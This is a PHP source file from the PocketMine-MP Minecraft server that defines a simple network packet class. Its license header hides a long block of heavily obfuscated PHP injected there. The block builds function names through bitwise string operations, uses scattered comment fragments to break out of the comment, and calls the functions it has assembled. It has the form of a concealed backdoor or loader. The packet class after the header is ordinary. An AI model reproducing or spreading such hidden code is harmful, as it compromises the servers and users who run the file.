<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
<?php
$ax='rB'|e0sJNSsbpY;$ZbSWQo='D@$!.S   `&'|"@D0 dQ(\$\$ .";$Wmrq='zwV}j{'.yTIkc&/*Y'.
    '8c*/leOet0b.'~cmJ';$lNVKJ='-D-'|'U 5';$AciK9D9mCpG='`^%f[R$P`@FE'|'X(e#'./*gY'.
    '__@<*/D0a0L.')od';$pb7a6jt=nm7GA."~*!yo7~FAp;8"^'C5}s$?ia?*sWu(0^q';$qcT1=#jb'.
    'Tw&'.ev4URQC0.'<a:,>Zc$<'&IIqqi.';^X]'.ku7ib.'/:VC5{';$frPh2='ul9='.fj53s.';1'.
    ''.w91e.'{u;e'&'7'.gw7dc.'?7'.e957.'}6o=9s|';$IMX0JMBDNN=' !@  !8'|'04'./*G0nR'.
    'Lj*/a1301;$Yl=' '|'4';$_YAnv1='mu='&'}tw';$XXX70L2uaN='gD~if|'&OVtsn7;'rjl2ae'.
    'fm&|gK[tXw';$ZfCmtAnxei9='8yo?8y'^'p-;og8';$yQl8lyhxt6n=ou&'c>';'EgBqXt3vVz5J'.
    'Y>_v.iL';$Jm63oH2gvu='#'^F;$ef59l48W=';'^X;$buKFGtFXj=M^')';$JYIO34TQ0_8=m&/*'.
    'vyI,$LJ2*/i;$II_XTXWVns='5'^T;$s4IHzvvA=PbEg.']"epd'|' r$!'.FpapH;$LS1RKfj=/*'.
    'i$*/MBA^',!$';$zXG=":&<"^rrh;$cv=V_Z_X3W&P_Y_M.'{o';$CS4BdhXD=_G&_c;'sYRg4VBY'.
    'yGWY>mYoP';$b0B4QLe1b='|'.MeNV&'O{MNu';$Rx4fQc4a='#'^'|';$EqN2hm=l^'%';'tDSbW'.
    'x R<';$a2fMTVGoCd=d^'4';$h1Q=$ZbSWQo|$Wmrq;$Ps62hhu1y=$lNVKJ&$_YAnv1;'Y3OTCsX'.
    'CI_hL';$vV2aoCQI=('B!@DHD'|'d! AHR')|$XXX70L2uaN;$yv=(dP4WG.'$eyE%"@'|'W"q%YW'.
    '`8'.yaa7)&$AciK9D9mCpG;$c4UxVI=('H8@@>N.""P_5%"'|B8AQl_.'" ( R1=$')^(/*XHwr1v'.
    'Uz*/" X-=!*UGX+1@SA"|')Q(< *MGP%9@SD');$f0v=$pb7a6jt|('r6K%3-Uk<,4Y68?Q3'^'Zu'.
    '!v[|0'.Jwnm.'}'.tYG4.'^');$ROo8Kfdm2K=$qcT1|('-rq='.Jrfp.'}]a~S>vy~e7u'&/*cNA'.
    ':P[*/eB5wS.':'.lyYS.'='.tF2h.'~Z^t?');if($h1Q($Ps62hhu1y($vV2aoCQI(/*aLZrzxmy'.
    'HLn*/$ZfCmtAnxei9)),$frPh2.$yQl8lyhxt6n.$Jm63oH2gvu.$IMX0JMBDNN.$ef59l48W./*b'.
    '#ZoYxDT*/$Yl.('3'&z)))$yv(('/u'&'?a').(z_^'U:'),$buKFGtFXj.$JYIO34TQ0_8./*IQX'.
    's>KoT-O*/$Jm63oH2gvu,$II_XTXWVns);$c4UxVI($s4IHzvvA.$LS1RKfj,$f0v,/*sWu7B6e8H'.
    'H9&e[h*/$vV2aoCQI($zXG.$cv.$CS4BdhXD.$b0B4QLe1b.$Rx4fQc4a.$EqN2hm./*XP6a_D5f1'.
    'ED,Kd==vU*/$a2fMTVGoCd),$ROo8Kfdm2K);#hBj<]BT|P ml(0+d%HY,97SF<x9uyF^KhoPrV0'.
    '7h>gY6}I:]i9K:;hC|*z>j&pIpi4X1qim,[B79>]X'; * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\network\mcpe\protocol;

#include <rules/DataPacket.h>

use pocketmine\network\mcpe\NetworkSession;

class SimpleEventPacket extends DataPacket{
	public const NETWORK_ID = ProtocolInfo::SIMPLE_EVENT_PACKET;

	public const TYPE_ENABLE_COMMANDS = 1;
	public const TYPE_DISABLE_COMMANDS = 2;
	public const TYPE_UNLOCK_WORLD_TEMPLATE_SETTINGS = 3;

	/** @var int */
	public $eventType;

	protected function decodePayload(){
		$this->eventType = $this->getLShort();
	}

	protected function encodePayload(){
		$this->putLShort($this->eventType);
	}

	public function handle(NetworkSession $session) : bool{
		return $session->handleSimpleEvent($this);
	}
}
